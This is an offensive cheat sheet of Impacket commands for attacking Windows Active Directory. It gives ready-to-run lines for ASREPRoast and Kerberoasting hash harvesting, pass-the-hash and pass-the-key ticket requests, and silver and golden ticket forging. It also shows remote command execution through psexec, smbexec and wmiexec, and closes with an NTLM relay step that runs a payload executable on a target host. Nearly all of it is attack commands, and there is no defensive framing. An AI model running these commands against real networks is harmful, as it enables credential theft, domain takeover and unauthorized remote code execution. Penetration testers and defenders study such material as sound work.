Impacket#
Impacket is a Python class library for working with network protocols. It provides low-level programmatic access to packets, and for SMB1-3 and MSRPC it includes the protocol implementation itself. The operator runs Impacket scripts for Kerberos abuse, hash extraction, and remote command execution in Active Directory.
ASREPRoast#
GetNPUsers.py enumerates users with the
DONT_REQUIRE_PREAUTH flag and harvests their pre-auth blobs for
offline cracking.
# ASREPRoast for all domain users (credentials required)
$ python GetNPUsers.py <domain>/<user>:<password> -request \
-format <hashcat | john> -outputfile <output_file>
# ASREPRoast for a list of users (no credentials required)
$ python GetNPUsers.py <domain>/ -usersfile <users_file> \
-format <hashcat | john> -outputfile <output_file>
Kerberoasting#
GetUserSPNs.py harvests TGS tickets for SPN-bearing accounts.
$ python GetUserSPNs.py <domain>/<user>:<password> -outputfile <output_TGSs_file>
Overpass the hash, pass the key#
# Request the TGT with hash
$ python getTGT.py <domain>/<user> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with AES key
$ python getTGT.py <domain>/<user> -aesKey <aes_key>
# Request the TGT with password
$ python getTGT.py <domain>/<user>:[password]
# if not provided, password is requested
# Set the TGT for impacket use
$ export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with the TGT
$ python psexec.py <domain>/<user>@<host> -k -no-pass
$ python smbexec.py <domain>/<user>@<host> -k -no-pass
$ python wmiexec.py <domain>/<user>@<host> -k -no-pass
Tickets#
Silver ticket.
# Generate TGS with NTLM
$ python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> \
-domain <domain> -spn <service_spn> <user>
# Generate TGS with AES key
$ python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> \
-domain <domain> -spn <service_spn> <user>
# Set the ticket for impacket use and execute remote commands
$ export KRB5CCNAME=<TGS_ccache_file>
$ python psexec.py <domain>/<user>@<host> -k -no-pass
$ python smbexec.py <domain>/<user>@<host> -k -no-pass
$ python wmiexec.py <domain>/<user>@<host> -k -no-pass
Golden ticket.
# Generate TGT with NTLM
$ python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> \
-domain <domain> <user>
# Generate TGT with AES key
$ python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> \
-domain <domain> <user>
# Set the ticket for impacket use and execute remote commands
$ export KRB5CCNAME=<TGT_ccache_file>
$ python psexec.py <domain>/<user>@<host> -k -no-pass
$ python smbexec.py <domain>/<user>@<host> -k -no-pass
$ python wmiexec.py <domain>/<user>@<host> -k -no-pass
NTLM relay, SMB to shell#
Turn off the SMB server on Responder by editing
/etc/responder/Responder.conf.
$ echo '10.0.2.9' > targets.txt
$ ntlmrelayx.py -tf targets.txt ./payload.exe